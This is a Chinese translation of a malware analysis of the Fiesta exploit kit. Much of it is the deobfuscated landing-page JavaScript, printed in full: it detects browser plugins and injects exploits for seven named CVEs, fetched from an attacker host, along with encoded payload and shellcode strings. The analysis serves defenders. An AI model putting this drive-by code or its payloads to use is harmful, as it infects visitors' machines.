深入分析 Fiesta Exploit Kit
作者:
·
2015/02/05 17:44
0x00 前言
from:http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an
在這個文章中,我將一步步介紹Fiesta Exploit Kit是如何工作的:如何重定向,攻擊感染客戶端,包含一個Flash exploit,Java exploit,PDF exploit,在最後解密他的payloads.
第一步是感染我的虛擬機器,幸運的是重定向頁面仍然還在
在頁面結束前,插入了一小段程式碼,有一點混淆,但是解碼很簡單:
exploit kit在znaaok.myftp.biz域名商,當時指向ip是92.63.87.16,在VirusTotal passivedns中查詢該IP,有很多相似的域名
所有域名活躍時間都非常短暫,經常輪換。
0x01 The landing page
繼續分析,虛擬機器的瀏覽器每個頁面都被嵌入javascript程式碼:
這個案例當中,exploit是一個Flash exploit,MD5值為f77e25d5a04d8035d49a27d1b680e35d
在VirusTotal提交樣本的時候57個防毒軟體中只有3個可以識別出。
從Fiddler的請求中可以確定下面的順序:
76:客戶端訪問頁面頁面
80:客戶端下載flash exploit
81:客戶端溢位成功後執行payload
再重新開始,當用sublime開啟頁面的時候,我立刻認出這是我2013年就見過的。除了上面的一些隨機文字字元,JavaScript的混淆是一樣的:
進行反混淆的工作:
1. 搜尋Decrypter字串
2. 解密所有使用過的函式跟字串
3. 替換所有使用的變數
4. 刪除所有被分割的字串(如:var a = ‘from’+ ‘Char’ + ‘Code’)
5. 清理程式碼(刪除未使用的變數)
6. 給變數函式易懂的命名
第一步找解密函式:
又去的是Fiesta沒有改變解密函式,只是換了key,也可以在messop()函式中看到
現在怎麼從哪些混淆的程式碼中解碼呢,很簡單,解密函式的的 頂部實際上是來自bonyv()函式,底部是seam9j函式,給他們換個易懂的名字。
現在可以把所有呼叫名字為messop()函式替換一遍:
正如你所看到的,開頭大部分宣告的變數都是全域性變數。解密所有的字串之後,我們開始替換全域性變數(比如lintl變成window.document等使程式碼更易讀一些),整理之後,頁面的結構更清晰了:
#!javascript
function CheckWindowsInUA() {
return (/Win64;/i.test(window.navigator.userAgent) || /x64;/i.test(window.navigator.userAgent));
}
function InjectScript(script) {
var injected_element = window.document.createElement("div");
window.document.body.appendChild(injected_element);
injected_element.innerHTML = script
}
function InjectIframe(url) {
var injected_iframe = window.document.createElement("iframe");
injected_iframe.frameBorder = '0';
injected_iframe.width = '10';
injected_iframe.height = '10';
injected_iframe.src = url;
window.document.body.appendChild(injected_iframe);
return injected_iframe
}
function isStringContainingNumber(item) {
return (typeof item == 'string' && /\d/.test(item))
}
function ExtractVersionNumbers(data) {
var double_num_regx = /[\d][\d\.\_,-]*/;
var extracted_vnumbers = isStringContainingNumber(data) ? double_num_regx.exec(data) : null;
return extracted_vnumbers ? extracted_vnumbers[0].replace(/[\.\_,-]/g, ',') : null
}
function GetTridentVersion() {
if (!/Trident\/(\d)/i.test(window.navigator.userAgent)) {
return 0
} else {
return parseInt(RegExp.$1)
}
}
function NormalizeVersionInfo(data, vlength) {
var templ_array = ['0', '0', '0', '0'];
var versioninfo = ExtractVersionNumbers(data.replace(/\s/g, '')).split(',');
for (var i = 0; i < versioninfo.length; i++) {
if (!(/\d/.test(versioninfo[i]))) {
versioninfo[i] = '0'
}
}
return versioninfo.concat(templ_array).slice(0, vlength)
}
function IsActiveXAvailable() {
return (typeof window.ActiveXObject != 'undefined');
}
function PadVersionInfo(vinfo, padding_size, prepend_padding) {
while (vinfo.length < padding_size) {
vinfo = prepend_padding ? '0' + vinfo : vinfo + '0'
}
return vinfo
}
function CreateFirstAvailableActiveXObject(obj_array) {
for (var i = 0; i < obj_array.length; i++) {
try {
var obj = new ActiveXObject(obj_array[i]);
if (obj) {
return obj
}
} catch (exc) {}
}
return null
}
function GetAdobeFlashVersion() {
try {
if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // Is it MSIE 11 or is ActiveX available
var flash_obj = CreateFirstAvailableActiveXObject("ShockwaveFlash.ShockwaveFlash");
if (flash_obj) {
var versioninfo = NormalizeVersionInfo(flash_obj.GetVariable("$version"), 4);
var padded_versioninfo = PadVersionInfo((versioninfo.slice(0, 3).join('')), 6, false);
return [padded_versioninfo, versioninfo[3]]
}
}
} catch (exc) {}
return null
}
adobeflash_version_info = GetAdobeFlashVersion();
// Adobe Flash Player CVE-2014-8439
function AdobeFlashExploit_CVE20148439() {
if (adobeflash_version_info != null && adobeflash_version_info[0] >= 120000 && adobeflash_version_info[0] <= 150000 && (adobeflash_version_info[0] != 150000 || adobeflash_version_info[1] < 189)) {
var exploit_params = "piw6lxXpfkwegJaaRh9yYgEZVLcA55HsZ68S1_F1pgbBWY2pBlgF1KzoEp2_Vrzpm4QERd5HhfMQnX2YZU87ekOFPqqWr7w5gzAQpubXJNPmHRV6MQ4Kx4z5VnkuHXgvl9TEePJvZ2GWcTfa-Jns94w-fb9PKnu1OTZaAEIEUAkkUEPodUhfqXslvZJWGXBPjofZyQo5vZ-14ChOmHzf8tWNnRVXFj_bM1kY8HoQ81LvfCZAf-nWvUZAHoR8Jb9FuniDwzmiGv2HKtvV6eef-RgXRDczxIcnw5Tna20sd09SJIY3JWo7Ujo3k3U4gna2J4c2RXhKanqwSkaRwp6rt5lz4OUl2tdtRol2OdtwaG8n0P8EouyzUGHCNKZ1ClbsunXhw6_MTUhdCeNlmxiuqk65st34XERp7FIyoC9k6c5kxtoq_6cNfk8zAZLtIO2QfKm7-H2WjB3wl1i-8PkbsSx7gF2RyVPM7oLJWtHwlbfE03JHtk04dCyQaxDzONPHfvVQcGMlvD6-1TMBctB3Zmjtj9zaa8BBaMJM7ivmOqKThtGQJLil2u8XMjH0ivihNjXoYYcMNynbkB9P7VL3wvRSbks3I6f_6FWX9xp3UrejTGFjB-dDcx4lxu0Mg6Gx1PPDG6krSynCyvyPMr_DNt3GE3lgIpchO2Md7UYHb-0zbDvGQ-mwVJ58cZbi62lXVFY2ZgpJIpLgNqiia44rAIbJIvxGCt00fTn4PTOAdRDHq9XCB1RKQ_wGohmAL5ztpg52RUaYa71LyG5yuteeu7kz2ph8BpRSsdvP3dqjRluSk224GVJdBx_PZ9Qnr4yqrYica48cyGlp6JN89Jb0v9B5r6KFtlia-K9_kfkKYReic_v6GKPVLRfC0Eq8RdX6tmckvWIdfBnxjRcM-HrL3zIL3_IL39sieJ-SS1OogSemH-2uH-2iOio3F7S6VHfaxxKB7cdR3HG-kaFqPnpmuaaw3Ip2k_F8folcYRKm9kCPYvtlSutX_bdEPBA6A2ZoE90adMKiiJusiJDriJdliGmpi5g-tRleE12-CDTTxH8hx1RECR-JuaLVgheHWPZ7c0z6dSvp2-bOaLzrTSNuEWODpVITQ3O7CNZ9C4mbg4n5ZoXeC0CIzdV75R1Sk0XG5Adwoy7GrG8ZbmvDeUDM-9O7Arh1BL1k4bm7W6-KU3zHsvhrh9yN3KU2kQb_qDYsvv3V_qVEzybFz9tZxRHHUvgmfGQWUirBU4PBbnJ1uCCBV8YrgOncBNdSjJVTHJoFjkaj0JUbJkR0f4SkGIxkwjxkUyxkdyb7wYwzAuracpjrApTQfOy13sCQWTaXHpvLRkkGxz0Uy3GSAZ2pTuIReLzpCNpRoRsr6LyF2EK1Cm-1JFzCdwMOAfz-vGbDEKFKnetJoHSgpPSz95K5ucMytnRAqJkpLL2-xsrpO4xzNTvt0l9qprz5KHep8F7dOaAvNGLpW7kvW6LTxNjIPb69bYOIDS7WVwrrbS7X2H6f5HqcZzZdOQKeCBuSCqWiM5AsVaAsMcLNM4hSIltlMvZWMTWHD4lHMTlKMTly2SlJkwlTH4LYHyDSVTtSBM5mju8To61rciGw8DpauEsb-Mh91Ib5oiFXzOenZ4Se24gJGFYNqOk58i0Wm6ePAnNNmntsEe2zE8PRH0SWZmxpIhm6eT-rV4c-QlKrOsJcDP4lqNQbuMu3_K6xb6pNkq9zwFNLrLDjgR8v-UMWNjGimNfBEtjqQsjqQsjFD4mkrbWVPaU1IQ53gG--JQrclHKyzNcRWJu1LJeSDtZRIsh4gO5GxF5KCTrGxvllxJIQCBrzMBLtxBMwIBhsZQqwZyZeOvkcZ4ZwIvCeMqtUMtxaMtWKMOOaISW7MBWNCS-WqcWYqFOyOsCv";
var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='twQHU'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='buys0=r_SET&softq='/><param name='Play' value='0'/></object>";
exploit_inject_script = exploit_inject_script.replace('r_SET', exploit_params);
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/1f247c512126d3ff04500b0f005802090150020f0301050a0452500202515409";
exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL
exploit_inject_script = exploit_inject_script.replace('twQHU', exploit_url); // Insert payload URL
InjectScript(exploit_inject_script);
}
}
AdobeFlashExploit_CVE20148439();
// Adobe Flash Player CVE-2014-0497
function AdobeFlashExploit_CVE20140497() {
if (adobeflash_version_info != null && adobeflash_version_info[0] >= 110000 && adobeflash_version_info[0] < 120000) {
var exploit_params = "Uty7aGiUrcYF-SKBlUybGiX686yCWAJYkL2tmkcj2hQ6Ter1eQxHH4Ox79uRvZ7Ysf6TNwwD9jGIyAsRUo7uhbiATr4LFUH9Y1MS2cYV7INrs7tmRr-pqrCIvFJ71qMTM19LJqkTyDecQ9pz2kCODWKrBfNdLSL-jPcqt7jVZTqSZarovw2fxsylV_kWfFZ-99AavMpGyB4jQVvpMqxz4HVRS4xQrs_asQkzKVoSK5sTWHiAWyKWCziAxkr8IEJlSFD-WI2_Z5hGBzkSv4TzqxxQH9bf6sZp_-JpgBVQvFFt3N7T3_jjeYjTIs0dNq6AnASAC68b5IVtlJ-_WoR-pQga8IoKGCdsHylRpYtNgjH0BOqEbYpzeLtCgqS15FsWc0ImzK-UB02_E4HxM1R7-JsIMhRXB6RYCUIjAq98YiW8g8-MD3T1G2C2KWdDktmYGF2O2bmsVZFJwxG-uLLbMct7YpdRVvdpCwu45rwNOLiL36ZgqgEXYaeP3j22L4LTTGCYCyged2SLY9xBCzQ3jiUtZRQa1lB61QJ0wev8JVsq18cyObjKbGxnlpeVYNDmgpIn14BUR7KyEZIvICcT_5z0f_ZTcXgixd7VYBxPRQ7CsjyWlyAFuy6-qrp6NZKjHRLEh9Jux7xAM5SPy_2DizdG5K9gcSZ0A5AIeYb6Ny3FNBtNvyXHvDz3utZ2-8N1v9s3U8ow7oN0RHGage3OOngVcDCo7n0nb-nJh-OxE7MGNfmUW5UlMe7NcuPMH96cSo43MutQlyI-kKkdVz9jky52Gc-BXc_tMw4-JwF1NnjtEZIX_qOyPQCQLotvtA79tEmtlmhtkKnINkM3QkDV3TLeFATqpribq-9iEakq177_CWt6_XMVZ5uC4b48atIZrQBF4gX_gZxjI-y6rq2evtVevNgevEsth8-hxbOl7m7zuyIeuyIwD9ETpiOAvIMBqJNazoLPrquLG6RFmIaDk6pHvWViuNqdbYKW1Glrhgh31xvrVYvyQjA9b-XA97Bn61UBPQG82kRW2k_-2kEKNKRxNLIrpGlN5b2PdqTqiCVii5UEd70JcUgVNOHHhzSOuG6ZPoeIiju7zx-OJwA75littbf00GsZ78c5diDa-pP94emjdF_5_lruCbC3IJjvCquJDXyvfKD6FikDB0_MqTz7OkR1XqoS8VDv7jrbC6H6Ox1-EfFGydRiIPZRxtsWVnEfGDCDf7IkfT1Cs-r2W5OFbEtIWeryWmPyctJf2Hhypt9-jPDZLuABT0pJx0xkTUtxO8Vy-JugWe7hhngh_XghWA0hJAYb_UHcMw-ZZ4udM4sXgPFYyX_Xh07Q1K5-aCJvSgUMMEjzQBOprdJRhPrp7h0Rz9smxHyliGKfUSpfT05UPUPsKZ5rVVcm7CH5JMawbPZ0OL6ShvwI5T1dxMkFrQdKkCTJtFeBwS7j66QXLQsI2nvMAc69QLtaDnIGg8mIBDKGBHtHgswjhKdkgs8jl4J7QYj0g4lDwbkLuZtNUklKplcRqFAAqdt9kijWHIjWDRD4D7OzLbPKDW_7O92wlYgwOaIHOaIZewIeRcO5usMSuKIY5t5YLyFuTHRHFn0uTWJJCfZBXVVooiGhznUua0bQ15OUIYHJeY3ehSGFdvOPKURnsJ65K6Jrs6WW72PSoO2PWEosNfBx2V4tE9T-QYnrVWL0MeiNF1_SmWv958ARGyeC2JEJIdKQoPJ-twLx2Z_Gp85sbPpaAsF8ez4MVeRMVe-dlYU_ivlOE9EZ0ltFp7U4lKCfJokpWfOPzXDX8Pqz_HrPVb1oxHNpWNbpWyyotBjwtQKSEvjFuqISEtOXutxfLslXDoOXDROtD_Wk1R5l1HCbVwPaVH17ObvGZrNyOxLsW-jY6olt6sI6Ae1l";
var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='xVpWi'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='talkh=P69jl&diadx='/><param name='Play' value='0'/></object>";
exploit_inject_script = exploit_inject_script.replace('P69jl', exploit_params);
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/44f7aa1e1db111d0000d510c565a065d0402560c5503015e010004015453505d";
exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL
exploit_inject_script = exploit_inject_script.replace('xVpWi', exploit_url); // Insert payload URL
InjectScript(exploit_inject_script)
}
}
AdobeFlashExploit_CVE20140497();
// Get the highest available Java version
function GetHighestJavaVersion() {
try {
var jvms = null;
var java_object_class_ids = ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"]; // Initiates the Java Deployment Toolkit
for (var clsid_i = 0; clsid_i < java_object_class_ids.length; clsid_i++) {
var java_object = window.document.createElement("object");
java_object.setAttribute("classid", java_object_class_ids[clsid_i]);
if (typeof java_object["jvms"] != 'undefined') {
jvms = java_object["jvms"];
break
}
}
if (jvms != null && jvms.getLength() != 0) {
var version = 0;
for (var jvm_i = 0; jvm_i < jvms.getLength(); jvm_i++) {
var jvm_verion_info = NormalizeVersionInfo(jvms.get(jvm_i)["version"], 4);
var c_version = parseInt(jvm_verion_info[1].concat(PadVersionInfo(jvm_verion_info[3], 2, true)), 10);
if (c_version > version) { // Check if this version is higher than the previous
version = c_version
}
}
return version
}
} catch (exc) {}
return null
}
java_version = GetHighestJavaVersion();
java_enabled = window.navigator.javaEnabled();
// Java Runtime Environment CVE-2013-2465
function JavaExploit_CVE20132465() {
if (java_enabled) {
if ((java_version && java_version > 630 && java_version < 722) || (!java_version && java_enabled)) {
var exploit_inject_script = "<applet width=10 height=10><param name='cent' value='http://znaaok.myftp.biz/ai_qkvu2/44075e88a64ef0cd574c550c025e0f000402000c010708030100520100575900;1;3@@'/><param name='jnlp_href' value='http://znaaok.myftp.biz/ai_qkvu2/49efdc53b7b51fa25e57095d5358020b040f555d50010508010d07505151540b'/></applet>";
if (java_version && java_version >= 710) { // Since 7u10 bundling has to be selected for self contained applications (https://blogs.oracle.com/talkingjavadeployment/entry/packaging_improvements_in_jdk_7)
exploit_inject_script = exploit_inject_script.replace("</applet>", "<param name='javafx_version' value='2.0+'/></applet>")
}
InjectScript(exploit_inject_script)
}
}
return
}
JavaExploit_CVE20132465();
// Java Runtime Environment CVE-2012-0507
function JavaExploit_CVE20120507() {
if ((java_version && java_version < 631) || (!java_version && java_enabled)) {
// Hex encoded string, contains non-ascii characters
var exploit_param = "aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200085b4c6c6170736b3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003";
var exploit_inject_script = "<applet archive='http://znaaok.myftp.biz/ai_qkvu2/5b76b7bdcefb3f0d5410560d550c555c0554070d5655525f005655005705035c' code='vailt' width=10 height=10><param name='ptas' value='http://znaaok.myftp.biz/ai_qkvu2/5230fd54a64ef0cd564a560b515f020c0504030b5206050f000651065356540c;1;2@@'/><param name='hamm' value='JRgN_'/></applet>";
exploit_inject_script = exploit_inject_script.replace('JRgN_', exploit_param);
InjectScript(exploit_inject_script)
}
return
}
JavaExploit_CVE20120507();
function PadNumber(number) {
return (number < 10 ? 0 : '') + number.toString()
}
function FormatVersionString(vdata) {
return (vdata[0] + '.' + vdata[1] + '.' + vdata[2] + PadNumber(vdata[3]) + PadNumber(vdata[4]))
}
function IsSpecifiedVersionSupported(obj, v_array, index, new_vnumber) {
var nversion = v_array.slice(0);
nversion[index] = new_vnumber;
return obj.IsVersionSupported(FormatVersionString(nversion))
}
function GetSilverlightVersion() {
var sl_plugin = null;
var sl_descr = null;
try {
if (GetTridentVersion() == 7 && (sl_plugin = window.navigator.plugins["Silverlight Plug-In"])) { // MSIE 11 available and Silverlight
sl_descr = sl_plugin["description"]
} else if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // MSIE 11 available and ActiveX
var sl_obj = CreateFirstAvailableActiveXObject(["AgControl.AgControl"]);
var supported_version = [1, 0, 1, 1, 1]; // Base version
var version_supported = 0;
var highest_version = [6, 2, 9, 12, 31]; // Highest version we go to
if (sl_obj && sl_obj.IsVersionSupported(FormatVersionString(supported_version))) { // Lowest version is available
// Following section bumps version numbers untill it hits one not supported
for (var i = 0; i < highest_version.length; i++) {
for (var version_num = supported_version[i] + (i == 0 ? 0 : 1); version_num <= highest_version[i]; version_num++) {
if (!IsSpecifiedVersionSupported(sl_obj, supported_version, i, version_num)) {
break
}
version_supported++;
supported_version[i] = version_num
}
}
if (version_supported) {
sl_descr = FormatVersionString(supported_version)
}
}
}
if (sl_descr) {
return NormalizeVersionInfo(sl_descr, 3).join('')
}
} catch (exc) {}
return null
}
silverlight_version = GetSilverlightVersion();
// Microsoft Silverlight CVE-2013-0074
function SilverlightExploit_CVE20130074() {
if (silverlight_version >= 4050401 && silverlight_version < 5120125) {
var exploit_inject_script = "<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='j2VIH'/><param name='initParams' value='pave=YOsTWLl1BQAASYA0CB+FyXX3/9Bhw+jo////9pMbHx9BluySTLemQW6kT6dtf2hrTfebHB8f45boso78C/eZHB8fjbKO/O2Wz/ewHB8ftPTtpqZsLsina36rH3Uf90ccHx/3IRwfH4jgTAsjGW0rT0t1F3Xg4EwnRY78OE9Ldx8PHx9IdQZN4Ewjjkf8CpQYEKlXHlaSW5cXlBef4j9sHOFcsfdrHR8fjvxtLt+zmt9rSk9I4ExfSUhI4ExbRx7Z9+ceHx+O/Ep1FEdXa1BPn2SxHmsO96YeHx+a32o84Ax5IvsdavufZPIfahJI9ywfHx+a32oU4Vzy9wweHx+O/NZHsh7Z9LuIkmxnSbMmIWrk2BkkLh8fQffgHh8f3HUfdeHgTBtJSEqW+qZEizSL94sdHx+O/GFOkkyHTeBMK5rfa22UTyOW2ZbYHJsPnx8fH5QX/H9/HG8TLt+G5vfJHR8fauee5UFupE9+axqc3wv0wOBvDx7RLtZWXrKa32sqSZJrGB0u34bn97UdHx9q557lSGvf60Fq/kEe4ZQrkUaUTiOUWw4DHFMOMx7XJtFtGybZaRcu39ZAQd0bH0mUag9JsprfauSY6EGSTIFNSeBMT478/05OTuBMU0bZHh9PSUjgTFtH2R9DSEhJmOGymt9q5HVgSeBML5IjGZJcsE9I4EwTdR9J4ErjnOcAaLf0u0lISpb6luGymt9q5ElIkmTxmOGzebSb32rmkmDhSOBMM0jgTFdBdSNGNtOW+E5ILt/stUCQGHVsd3Effh93bR9qH5Z4E6Zwii4Pp7APFLf3Sh4fH5ZYF3V6d3ofZx93ex8xH3d8H3IflngPlmgLprQ7yMinaf7w2Uj3NB4fH9ZAQdxISpb6dUtGNtOW5Zb4SC7f7LVAklAPdVuQHkhOT09PT09PT03gTDfWQNxISS7fT091Hk91HHUcSOBMB19rBleIsnUfS09JSOBMA5rfaxZI4Ew/SOBMO19BQNxJTJbhLt+G4dk2zh7ISE4uxIbh3JUbAR/dmRsJlxsBHRsJlRsZLRi1/fdGQERB3Eou1k6W/U5OTUlOpsKTvginsiHO3vebHx8fQprfanma4Gt7lFofdR9ISuBPL5rfakuUWBea32tST0tP91YfHx+JSUqUWh/gTxNGmt9qKLKNsi7PIllMS09qNLIuzybXajuyLs9PmOic9g/3feDg4E5IdR/gTBdGJtdqFeApSeBMM5jo9B0u30Lcph8PHx+a32odltd1X05PdR/gTA/cT/cXHx8fRvcoHx8f4P9ISUwu4HuUYC+UYBOUYAuW5C7fhpQgJuRrCJRoN5rpa+/m91YfHx+zaugm1ZRYD2r/REFA3H+UTyOW3JbZTxxbD2cu8lp/HEc/HCu0Lt+G5/cEHx8faucm1X5q9xxHOxCoM3QcbwNHHBuxlls7A37cs2wZI35tHTM/3tUSHt2b39x3c3ZxdB9DH1MfcB9oHx8fam1zcnBxH0N8cnsxemd6FkMxMUNxcGt6b357MXpnej8wfD98cG9mPzBGPz06TD0/PTpMPT85OT9sa35taz89PT89Okw9HzB8P2xrfm1rPz09Px/3cOTg4Ll0isDKtC6cZPXeY6eQEWqGpOn/Hx8fH0FupE9hkrtN02ERFB//xKJMX+DXg6DWMfNgx6CAql/rxUORTzTYEtFtf2hrHx8fH0AXpkTq12UnxMHJbR8fHx9IRFR8AYp0mHDjKDuW06LXAA+M9PV/mKQfHx8fHx8fH3dra28lMDBlcX5+cHQxcmZ5a28xfXZlMH52QG50aWotMC4sfih+KC96KXsrKnx5KX0qLSssL34vfCopL3wvKCp7Ly4vKiouL3wqKioqLy8qei8rLygvLC8uKisvKiouKnskKh8fHx8='/></object>";
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/2b6b367b48844f2e410e4059040d005a0254065907540759075654540604565a";
exploit_url = [exploit_url, silverlight_version].join(';'); // Insert Silverlight version numbers in URL
exploit_inject_script = exploit_inject_script.replace('j2VIH', jnv);
InjectScript(pa)
}
}
SilverlightExploit_CVE20130074();
// Microsoft Internet Explorer CVE-2013-2551
function MSIEExploit_CVE20132551() {
var fut, om;
var trident_version = GetTridentVersion();
if ( !CheckWindowsInUA() &&
( trident_version == 6 || // Trident version 6, identifies Internet Explorer 10
trident_version == 5 || // Trident version 5, identifies Internet Explorer 9
trident_version == 4)) // Trident version 4, identifies Internet Explorer 8
{
InjectIframe("http://znaaok.myftp.biz/ai_qkvu2/40319b9a99f7cc915d555f0a0e590e590406030a0d00095a010451070c505859");
}
return
}
MSIEExploit_CVE20132551();
function GetAdobePDFVersion() {
try {
// If its MSIE 11 or ActiveX Controls are available instanciate PDF object, otherwise null
var activex_obj = (GetTridentVersion() == 7 || IsActiveXAvailable()) ? CreateFirstAvailableActiveXObject(["AcroPDF.PDF", "PDF.PdfCtrl"]) : null;
var pdf_obj = window.document.createElement("object");
pdf_obj.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000"); // Initiates the 'pdf.ocx' ActiveX control
pdf_obj.setAttribute("src", '');
var version_string = null;
try {
// Get version of either one of the valid objects
version_string = (activex_obj || pdf_obj).GetVersions()
} catch (exc) {}
if (version_string) {
var version_extract = version_string.match((/=\s*[\d\.]+/g));
var version = 0;
for (var i = 0; i < version_extract.length; i++) {
var c_version = parseInt(NormalizeVersionInfo(version_extract[i], 3).join(''), 10);
if (c_version > version) {
version = c_version
}
}
return version
}
} catch (exc) {}
return null
}
adobepdf_version = GetAdobePDFVersion();
// Adobe PDF CVE-2010-0188
function AdobePDFExploit_CVE20100188() {
var triden_version = GetTridentVersion();
if (triden_version == 4 || triden_version == 5) { // Check for MSIE 8 or 9
if ((adobepdf_version >= 800 && adobepdf_version < 821) || (adobepdf_version >= 900 && adobepdf_version < 931)) {
var exploit_inject_script = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='irH3d'/></object>";
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/6b2f2de7ba83a9dc5a0b505d055f520f0654025d0606550c035650500756040f";
exploit_url = [exploit_url, adobepdf_version].join(';'); // Insert Adobe PDF version numbers in URL
exploit_inject_script = exploit_inject_script.replace('irH3d', exploit_url);
InjectScript(exploit_inject_script);
}
}
return
}
AdobePDFExploit_CVE20100188();
看一下Fiesta使用了哪些漏洞:
Adobe Flash
CVE-2014-8439: Adobe Flash Player before 13.0.0.258 and 14.x and 15.x before 15.0.0.239 on Windows and OS X and before 11.2.202.424 on Linux, Adobe AIR before 15.0.0.293, Adobe AIR SDK before 15.0.0.302, and Adobe AIR SDK & Compiler before 15.0.0.302
CVE-2014-0497: Adobe Flash Player before 11.7.700.261 and 11.8.x through 12.0.x before 12.0.0.44 on Windows and Mac OS X, and before 11.2.202.336 on Linux
Adobe PDF
CVE-2010-0188: Adobe Reader and Acrobat 8.x before 8.2.1and 9.x before 9.3.1
Java
CVE-2012-0507: Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33
CVE-2013-2465: Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7
Silverlight
CVE-2013-0074: Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0
Microsoft Internet Explorer
CVE-2013-2551: Microsoft Internet Explorer 6 through 11
有趣的是,Fiesta exploit kit完全專注的IE瀏覽器,檢測到Adobe PDF, Adobe Flash, Java外掛也只是用於IE。
0x02 Following the flash exploit landing page trail
透過網路抓包可以確定虛擬機器是被用的FLash exploit攻擊,透過對比URL看到使用的是CVE-2014-8439。
這個CVE最初由kafeine在Angler exploit kit中以0day的方式發現的。CVE-2014-0569 (Flash Player) integrating Exploit Kit Out-of-Band Flash Player Update for CVE-2014-8439
反編譯ActionScript程式碼之後,我們找到一段指令碼:
整理之後程式碼:
截圖顯示的不是很完整,有一個函式沒有展示出來LoadComplete函式:
stage 2的資料追加到root/main物件中,stage 2實際上是另外一個flash檔案,透過addChild函式,stage 2 flash檔案將會被啟用,從記憶體當中dump出來解密的stage 2資料,我們可以看到Flash檔案的頭:
反編譯這個FLash檔案獲得了大約820行的ActionScript程式碼,我不打算針對這個漏洞繼續深入他是如何利用的,如果你想知道是如何利用的已經有人寫過相關文章 An interesting case of CVE-2014-8439 exploit
截圖當中的ActionScript程式碼只是第一步打包載入的作用,第二步才是真正的利用漏洞獲取執行許可權,為了獲得執行許可權,垃圾收集器的
垃圾收集器內部有一指標指向一個ITelemetry物件,透過一個包含精心準備構造虛擬表的ITelemetry物件能夠獲得執行許可權,修改虛擬表後的ITelemetry,替換了正確的ITelemetry函式,指向了我們的shellcode。
反編譯完嵌入的flash檔案(第二步中)之後,我們得到了一個簡單的as指令碼,發現了一個有趣的函式initialization,程式碼引用目標網頁上的一個變數,然後呼叫了一些函式:
如果我們跟蹤seatk函式,看到了跟之前很類似的程式碼,是一個字串解密函式:
看來Fiesta把同一個加密混淆的函式用在了很多地方,函式返回解碼後的資料就是結合ROP鏈利用的shellcode。
由於這個flash漏洞(CVE-2014-8439)是剛剛發現的,POC並沒有放出來,所以我不會洩露利用的細節。
現在已經知道了Fiesta現在的使用的攻擊:
登陸頁面給使用哪個shellcode/payload提供資訊 exp有打包來應對檢測 第3階段的exp顯示他是一種可以很容易置換的框架
接下來講一下針對Java 的exp
0x03 JAVA payload解密
該java的exp樣本基於CVE-2013-2465
5c6c4a6a4c5adc49edabd21c0779c6e3
我們可以從登陸介面發現,‘JavaExploit_CVE20132465’ 功能,對java applet進行如嵌入。
在我們反編譯jar包之後我們可以得到一份存在一些混淆的java原始碼,審查原始碼我們可以發現,其中一個功能在於下載payload並執行。對java原始碼進行處理後如圖片所示我們可以一份清晰的原始碼。
讓我們先看函式的頂部,我們可以發現exp似乎對不同的payload提供了支援。
下載payload之後讀取前256個位元組,其中包括了xor key以及payload的有效部分,我們可以在虛擬機器中分析這256個位元組的差異。
其中我們可以看到關鍵的java程式碼在於 “Decrypt” 功能,用於payload的解碼,在還原java原始碼之後,這部分函式如下圖所示:
程式碼的第一部分使用兩個index把需要解密的每位元組資料遞增,兩個index中key的值被交換,相加掩藏在形成為XOR運算的關鍵位置。
這個XOR解密用在整個PE資料回收中,從前面的程式碼段中還可以看到payload的檔名是純數字的為當前的計算機的時間。
在將java程式碼轉換成python後我們可以很容易的解碼他。
在成功解碼資料後我們可以將payload放入Fiesta,現在在payload上讓我們嘗試我們前面說過的flash exp。
可惜看起來似乎不能工作,解密後的payload的執行結果無論是Flash,adobe PDF還是Silverlight都返回錯誤。它看起來似乎不是普通的java程式碼,是利用了一種基於控制執行的shellcode,並且使用不同的加密手段。我們可以從硬碟上解密出的payload看到,是不同於最初256位元組的XOR塊的,payload可以傳輸任何shellcode。
現在我們需要檢視exp中的shellcode,先前我們已經看過了flash exp但是停在了利用點,現在我們可以透過java exp去解密payload,那麼接下來我們來看看另一種型別:adobe pdf
0x04 Adobe PDF exploit
樣本:f4346a65ea040c1c40fac10afa9bd59d
使用peepdf分析PDF:
peepdf告訴我們有一個AcroForm和一些JavaScript。我們看一下AcroForm,就會看到呼叫初始化時其實用的是JavaScript,手續跟蹤object關係直到找到XFA:
下滑就找到真正的AcroForm指令碼,就能找到初始化設定的(混淆的)JavaScript程式碼
清理下程式碼找到最後看看漏洞如何觸發的,在這段JavaScript程式碼中,一個惡意的image物件被shellcode建立:
在expl_imgdata傳給image之前提取出來,可以用base64解碼,看看shellcode,在shellcode當中我們找到真正的解密函式,與之前的Java exploit完全一樣。
256位元組的XOR key之前有16個(額外)個位元組儲存資訊。shellcode中下載payload,前16個位元組被用於確定實際payload的大小,這些值是XOR的。前4個位元組是下12個位元組XOR key。看起來是這樣子的:
